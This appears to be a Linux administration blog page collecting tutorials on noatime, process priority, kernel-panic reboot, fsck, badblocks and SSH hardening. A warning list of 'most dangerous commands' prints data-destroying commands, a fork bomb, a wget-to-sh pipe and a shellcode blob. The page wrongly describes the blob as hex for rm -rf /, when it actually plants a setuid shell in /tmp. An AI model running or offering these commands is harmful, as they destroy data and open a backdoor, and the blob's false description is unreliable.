October 2025
M T W T F S S
 12345
6789101112
13141516171819
20212223242526
2728293031  

Categories

October 2025
M T W T F S S
 12345
6789101112
13141516171819
20212223242526
2728293031  

Improving filesystem read performance using “noatime”

Improving filesystem read performance using “noatime”

 

Linux records information about when files was last accessed. There is a cost associated with recording the last access time. The ext3 file system of Linux has an attribute that allows the super-user to mark individual filesystem to ignore recording of last access time. This may lead to significant performance improvements on often accessed frequently changing files such as the contents of the web server directory.

The only drawback is that none of the file’s atime (access time) will be updated.

Linux has a special mount option for file systems called “noatime” that can be added to each line that addresses one file system in the /etc/fstab file. If a file system has been mounted with this option, reading accesses to the file system will no longer result in an update to the atime (access time) information associated with the file.

The importance of the noatime setting is that it eliminates the need by the system to make writes to the file system for files which are simply being read. Since writes can be somewhat expensive, this can result in measurable performance gains.

Note that the write time information to a file will continue to be updated anytime the file is written to.

Edit the fstab file vi /etc/fstab and add in the line that you are interested in adding the “noatime” option show below:

/dev/sda1          /var/www          ext3          defaults,noatime          1  2

Process priority with nice

Process priority with nice

Modern operating systems are multi-user and multitasking, which means that multiple users and multiple tasks can be using the computer at any given time. Typically you’ll have one person using a desktop system running any number of applications or many users using many applications on a server.

The amount of time devoted to tasks largely depends on how intensive the task is. Some tasks require higher priority than others; for instance, if you were compiling a large software package you didn’t need immediately, that priority should probably be lower than your Web browser or e-mail client.

Each process has a niceness value associated with it, which is what the kernel uses to determine which processes require more processor time than others. The higher the nice value, the lower the priority of the process. In other words, the “nicer” the program, the less CPU it will try to take from other processes; programs that are less nice tend to demand more CPU time than other programs that are nicer.

The priority is noted by a range of -20 (the highest) to 20 (the lowest). Using ps, you can see the current nice value of all programs:

$ ps axl
F   UID   PID  PPID PRI  NI    VSZ   RSS WCHAN  STAT TTY        TIME COMMAND
4     0     1     0  16   0   2648   112 -      S    ?          0:01 init [3]
1     0     2     1  34  19      0     0 ksofti SN   ?          0:02 [ksoftirqd/0]
5     0     3     1  10  -5      0     0 worker S<   ?          0:00 [events/0]
...

You can see that init has a nice value of 0, while other kernel tasks associated with PID 2 and 3 have a nice value of 19 and -5 respectively.

Typically, a program inherits its nice value from its parent; this prevents low priority processes from spawning high priority children. Having said that, you can use the nice command (as root or via sudo) with the command you wish to execute in order to alter its nice value. Here is a short illustration:

# ps axl | grep axl | grep -v grep
4     0 30819 30623  15   0   4660   772 -      R+   pts/0      0:00 ps axl
# nice -10 ps axl | grep axl | grep -v grep
4     0 30822 30623  30  10   4660   772 -      RN+  pts/0      0:00 ps axl

You can see there that the nice value, represented by column six, has been altered. You can also use the renice command to alter running processes. In the following example, vim was started to edit the file foo and began with a default nice value of 0. Using renice, we can change its priority:

# ps axl | grep vim | grep -v grep
0     0 30832 30623  16   0  15840  3140 -      S+   pts/0      0:00 vim foo
# renice -5 30832
30832: old priority 0, new priority -5
# ps axl | grep vim | grep -v grep
0     0 30832 30623  15  -5  15840  3140 -      S<+  pts/0      0:00 vim foo

Here, we have adjusted the priority of vim, giving it a slightly higher priority. Renice operates on the process ID, so using grep, we determined that vim is process ID 30832 and saw that the nice value was 0. After executing renice, the nice value is now -5.

Standard caveats apply: Only root can alter the nice priority of programs. So if you find that your compilation is taking too much CPU from other activities, consider renicing the parent process via root. Subsequent children should have a better nice value, or you can even start the compilation (or any other activity) with nice, specifying an appropriate nice value. You can also use renice to renice all programs belonging to a process group or user name/ID.

 

 

If you wish to run a command which typically uses a lot of CPU (for example, running tar on a large file), then you probably don’t want to bog down your whole system with it. Linux systems provide the nice command to control your process priority at runtime, or renice to change the priority of an already running process. The full manpage has help, but the command if very easy to use:

1
$ nice -n prioritylevel /command/to/run

The priority level runs from -20 (top priority) to 19 (lowest). For example, to run tar and gzip at a the lowest priority level:

1
$ nice -n 19 tar -czvf file.tar.gz bigfiletocompress

similarly, if you have a process running, use ps to find the process ID, and then use renice to change it’s priority level:

1
$ renice -n 19 -p 987 32

Auto reboot after kernel panic

When a kernel encounters certain errors it calls the “panic” function which results from a unrecoverable error. This panic results in LKCD (Linux Kernel Crash Dump) initiating a kernel dump where kernel memory is copied out to the pre-designated dump area. The dump device is configured as primary swap by default. The kernel is not completely functional at this point, but there is enough functionality to copy memory to disk. When the system boots back up, it checks for a new crash dump. If a new crash dump is found it is copied from the dump location to the file system, “/var/log/dump” directory by default. After copying the image, the system continues to boot normally and forensics can be performed at a later date.

By default after a kernel panic, system just waits there for a restart.  This is because of the value set on “kernel.panic” parameter.

# cat /proc/sys/kernel/panic
0

To disable this and make the Linux OS reboot after a kernel panic, we have to set an integer value greater than zero to the paramter “kernel.panic“, where the value is the number of seconds to wait before a automatic reboot.  For example , if you set it to “10” , then the system waits for 10 seconds before automatic reboot. To make this permanent, edit /etc/sysctl.conf and add following like at end of the file.

kernel.panic = 10

Linux is a robust and stable operating system kernel, but there are instances where it can panic, be it due to bad hardware or bad software. It does not happen often, but it can happen.

If you’re running a server or some other always-on system that you may not have easy access to, a kernel panic typically means an inconvenient trip to reboot a system or a phone call to inconvenience someone else. You can, however, configure Linux to automatically reboot on a kernel panic by making a small modification to /etc/sysctl.conf, a configuration file that tweaks many kernel operating parameters.

Add the following to /etc/sysctl.conf:

kernel.panic = 20

This tells the kernel that if it encounters a panic, it is to reboot the system after a 20 second delay. By default, the kernel will never reboot when it encounters a panic, but with the above setting you can force it to.

Of course, if you enable this, make sure you are using swatch or some other means of observing log files to make sure you aware of the fact when the system panics so you can take appropriate steps to correct the problem.

On local systems, it is also convenient to be able to reboot the system with a key-press in the case of a panic. Instead of having the system reboot automatically on a local system, consider using the magic SysRq keys to reboot your system if X locks up or keyboard entry is being ignored.

To enable magic SysRq support, you must again edit /etc/sysctl.conf; some Linux distributions have this enabled by default whereas others do not.

kernel.sysrq = 1

If the time comes when the SysRq keys are required, use the magic SysRq combination, which is: [ALT]+[SysRq]+[COMMAND], where the [SysRq] key is the “print screen” key and [COMMAND] is one of the following:

  • b – reboot immediately without syncing or unmounting disks
  • e – sends a SIGTERM to all running processes, except for init
  • o – shut down system
  • s – attempt to sync all mounted filesystems
  • u – attempt to remount all mounted filesystems as read-only

These keys need to be pressed together simultaneously to take effect.

Auto-rebooting is great for remote systems, and the magic SysRq combo is very useful for local systems.

 

By default after a kernel panic, Linux kernel just waits there for a system administrator to hit the restart or powercycle button.  This is because of the value set on “kernel.panic” parameter.

[root@linux23 ~]# cat /proc/sys/kernel/panic
0
[root@linux23 ~]# sysctl -a | grep kernel.panic
kernel.panic = 0
[root@linux23 ~]#

To disable this and make the Linux OS reboot after a kernel panic, we have to set an integer N greater than zero to the paramter “kernel.panic”, where “N” is the number of seconds to wait before a automatic reboot. 

For example , if you set N = 10 , then the system waits for 10 seconds before automatic reboot. To make this permanent, edit /etc/sysctl.conf and set it.

[root@linux23 ~]# echo “10” > /proc/sys/kernel/panic
0
[root@linux23 ~]# grep kernel.panic /etc/sysctl.conf
kernel.panic = 10
[root@linux23 ~]#

Limit the CPU usage of an application (process) – cpulimit

Limit the CPU usage of an application (process) – cpulimit

 

cpulimit is a simple program that attempts to limit the cpu usage of a process (expressed in percentage, not in cpu time). This is useful to control batch jobs, when you don’t want them to eat too much cpu. It does not act on the nice value or other scheduling priority stuff, but on the real cpu usage. Also, it is able to adapt itself to the overall system load, dynamically and quickly.

Installation:
Download last stable version of cpulimit
Then extract the source and compile with make:

tar zxf cpulimit-xxx.tar.gz
cd cpulimit-xxx
make

Executable file name is cpulimit. You may want to copy it in /usr/bin.

Usage:
Limit the process ‘bigloop’ by executable name to 40% CPU:

cpulimit –exe bigloop –limit 40
cpulimit –exe /usr/local/bin/bigloop –limit 40

Limit a process by PID to 55% CPU:

cpulimit –pid 2960 –limit 55

cpulimit should run at least with the same user running the controlled process. But it is much better if you run cpulimit as root, in order to have a higher priority and a more precise control.

How to check/repair (fsck) filesystem after crash or power-outage

How to check/repair (fsck) filesystem after crash or power-outage

 

At some point your system will crash and you need to perform a manual repair of your file system. A typical situation would be power loss while you are working on the system. You reboot and the system stops and indicates you must perform a manual repair of the system using fsck.

fsck (file system consistency check) is a command used to check filesystem for consistency errors and repair them on Linux filesystems. This tool is important for maintaining data integrity so should be run regularly, especially after an unforeseen reboot (crash, power-outage).

Usage: fsck [-sACVRTNP] [-t fs-optlist] [filesystem] [fs-specific-options]

Filesystem can be either a device’s name (e.g. /dev/hda) or its mount point. fsck run with no options will check all devices in /etc/fstab. It might be neccesary to run fsck from single-user mode

Note: You need to be “root” to use any of the below mentioned command

* Take system down to runlevel one: # init 1

* Unmount file system, for example if it is /home (/dev/sda2) file system then type command:
# umount /home OR  # umount /dev/sda2

* Now run fsck on the partition: # fsck /dev/sda2

* Specify the file system type using -t option: # fsck -t ext3 /dev/sda2 OR  # fsck.ext3 /dev/sda2

fsck will check the file system and ask which problems should be fixed or corrected. If you don’t wanna type y every time then you can use pass -y option to fsck: # fsck -y /dev/sda2

Please not if any files are recovered then they are placed in /home/lost+found directory by fsck command.

* Once fsck finished, remount the file system: # mount /home

Get Hostname from IP address

Get Hostname from IP address

 

To get the hostname from the IP address.
The simplest way is to use the “host” utility provided by Gnu/Linux. Just run…

testserver:~ # host 64.233.187.99
99.187.233.64.in-addr.arpa domain name pointer jc-in-f99.google.com.

Howto check disk drive for errors and badblocks

badblocks is a Linux utility to check for bad sectors on a disk drive (A bad sector is a sector on a computer’s disk drive or flash memory that cannot be used due to permanent damage or an OS inability to successfully access it.). It creates a list of these sectors that can be used with other programs, like mkfs, so that they are not used in the future and thus do not cause corruption of data. It is part of the e2fsprogs project.

It can be a good idea to periodically check for bad blocks. This is done with the badblocks command. It outputs a list of the numbers of all bad blocks it can find. This list can be fed to fsck to be recorded in the filesystem data structures so that the operating system won’t try to use the bad blocks for storing data. The following example will show how this could be done.

From the terminal, type following command:

$ sudo badblocks -v /dev/hda1 > bad-blocks

The above command will generate the file bad-blocks in the current directory from where you are running this command.

Now, you can pass this file to the fsck command to record these bad blocks

$ sudo fsck -t ext3 -l bad-blocks /dev/hda1
Pass 1: Checking inodes, blocks, and sizes
Pass 2: Checking directory structure
Pass 3: Checking directory connectivity
Pass 4: Check reference counts.
Pass 5: Checking group summary information.

/dev/hda1: ***** FILE SYSTEM WAS MODIFIED *****

/dev/hda1: 11/360 files, 63/1440 blocks

If badblocks reports a block that was already used, e2fsck will try to move the block to another place. If the block was really bad, not just marginal, the contents of the file may be corrupted.

Looks at badblocks man pages for more command line options.

Linux Commands to Monitor Memory Usage

Linux Commands to Monitor Memory Usage

 

vmstat Monitor virtual memory
free Display amount of free and used memory in the system.
pmap Display/examine memory map and libraries (so). Usage: pmap pid
top Show top processes
sar -B Show statistics on page swapping.
time -v date Show system page size, page faults, etc of a process during execution. Note you must fully qualify the command as “/usr/bin/time” to avoid using the bash shell command “time”.
cat /proc/sys/vm/freepages Display virtual memory “free pages”.
One may increase/decrease this limit: echo 300 400 500 > /proc/sys/vm/freepages
cat /proc/meminfo Show memory size and usage.

The 7 most dangerous commands of GNU/Linux

The 7 most dangerous commands of GNU/Linux

 

1. rm-rf /
This powerful command deletes all files in our root directory “/” if they want to see the power of this command to see this video

2. Code:

char esp [] __attribute__ ((section (. “text”))) / * esp
release * /
= “\ Xeb \ x3e \ x5b \ x31 \ xc0 \ x50 \ x54 \ x5a \ X83 \ xec \ x64 \ x68?
“\ Xff \ xff \ xff \ xff \ x68 \ xdf \ xd0 \ xdf \ xd9 \ x68 \ x8d \ x99?
“\ Xdf \ x81 \ x68 \ x8d \ x92 \ xdf \ xd2 \ x54 \ x5e \ xf7 \ x16 \ xf7?
“\ X56 \ X04 \ xf7 \ X56 \ x08 \ xf7 \ X56 \ x0c \ X83 \ xc4 \ x74 \ X56?
“\ X8d \ x73 \ x08 \ X56 \ x53 \ x54 \ X59 \ xb0 \ x0b \ xcd \ x80 \ x31?
“\ Xc0 \ x40 \ xeb \ xf9 \ xe8 \ xbd \ xff \ xff \ xff \ x2f \ x62 \ x69?
“\ X6e \ x2f \ x73 \ x68 \ x00 \ x2d \ x63 \ x00?
“Cp-p / bin / sh / tmp / .beyond; chmod 4755
/ tmp / .beyond; ”

This is the hex version of [rm-rf /] that can deceive even those not experienced users of GNU/Linux.

3. mkfs.ext3 / dev / sda

This will reformat all the files on the device that is mentioned after the mkfs command.

4. :(){:|:&};:

Known as forkbomb, this command to run a large number of processes until the system freezes. This can lead to data corruption.

5. any_command> / dev / sda

This command causes total loss of data, in the partition that is mentioned in command

6. http://some_untrusted_source wget-O-| sh

Never download untrusted sources and below are implemented, they may be malicious codes

7. mv / home / yourhomedirectory / * / dev / null

This command will move all the files in your home to a place that does not exist, never really your files again

If you got any other dangerous command, please let me know, I will include it over here.

[Ref: http://www.linuxpromagazine.com/online/news/seven_deadliest_linux_commands?category=13447]

Securing SSH

Securing SSH

 

SH is how most administrators connect to their servers. It is also one of the most commonly attacked ports on a Linux Server. If you followed my previous tutorial about how to install fail2ban, you’ve probably noticed that you receive many emails about failed attacks. In this tutorial, I’ll show a few more steps that can be taken to lock down the SSH daemon and your server even further.
Before we begin, I’d like to show you a few stats about your server. The following commands will show you some interesting information about the brute force attacks you’ve been noticing on your server.

First – Show the 5 most recently attacked user accounts on your system. In this list you may notice user accounts that don’t even exist on your system. That is because someone is trying automated attacks against you:

lastb | awk '{print $1}' | sort | uniq -c | sort -rn | head -5

Next – Show the 5 most attacked accounts. Again, user accounts that don’t exist may be in this list.

awk 'gsub(".*sshd.*Failed password for (invalid user )?", "") {print $1}' /var/log/secure* | sort | uniq -c | sort -rn | head -5

Finally – Show the 5 most frequent attacker IP addresses. These are addresses that attempt to connect to your server.

awk 'gsub(".*sshd.*Failed password for (invalid user )?", "") {print $3}' /var/log/secure* | sort | uniq -c | sort -rn | head -5

Securing SSH

Now that you can see what’s coming at your server, what can you do about it? Below are a few steps you can take to secure SSH.

vi /etc/ssh/sshd_config

This is the main configuration file for SSH. All of our changes will be in here.

The first setting we are looking for is Protocol. We want this changed to a 2. Most modern Linux Distributions already have this by default, but some may still allow the first version of the protocol to connect. We don’t want this.

Protocol 2

Next, we are going to deny root the ability to log in via SSH. Root doesn’t need direct access, because we have already set up sudo. Find the PermitRootLogin setting and change it to no.

PermitRootLogin no

The next step is to limit the amont of time an unauthenticated session can hold open a connection. By default this is two minutes. This is way to long. Find the GraceLoginTime setting and change it to a more reasonable time. The value listed here is in seconds. The example below allows 30 seconds for a user to enter their password before the connection is closed.

LoginGraceTime 30

The next one is to change the SSH port. It should be noted that this step brings no additional security to your system at all. It will, however, reduce the number of random, automated attacks that hit your server. Again, it will NOT bring additional security to your system. Find the Port setting and change it to another port. Common practice is to raise this above 1024, as everything below that is reserved for other programs.

Port 22222

Now when you connect to your server, you will need to modify your connection port to use 22222.

Next, we can set up SSH to only allow whitelisted users or groups. The following will only allow users ‘mary’, ‘john’ and any user that starts with ‘joe’ to conenct. This line gets placed at the end of the file:

AllowUsers john mary joe*

This setting, alternatively, will allow all users from the ‘sshusers’ group to login

AllowGroups sshusers

Finally, we can only allow users to log in using public/private key pairs. How to set this up is beyond the scope of this tutorial, so if you don’t know how to do so, do not change this setting:

PasswordAuthentication no

Save and exit this file. Now we restart sshd and you are good to go.

Note: Do not log out of your active SSH session after running this command until you have tested that you can connect. If you do and something does not work, you will be locked out of your server.

service sshd restart

If you are able to log in using another Putty or SSH session, your changes have worked. Remember when you log in, if you changed your Port, you need to specify the new port.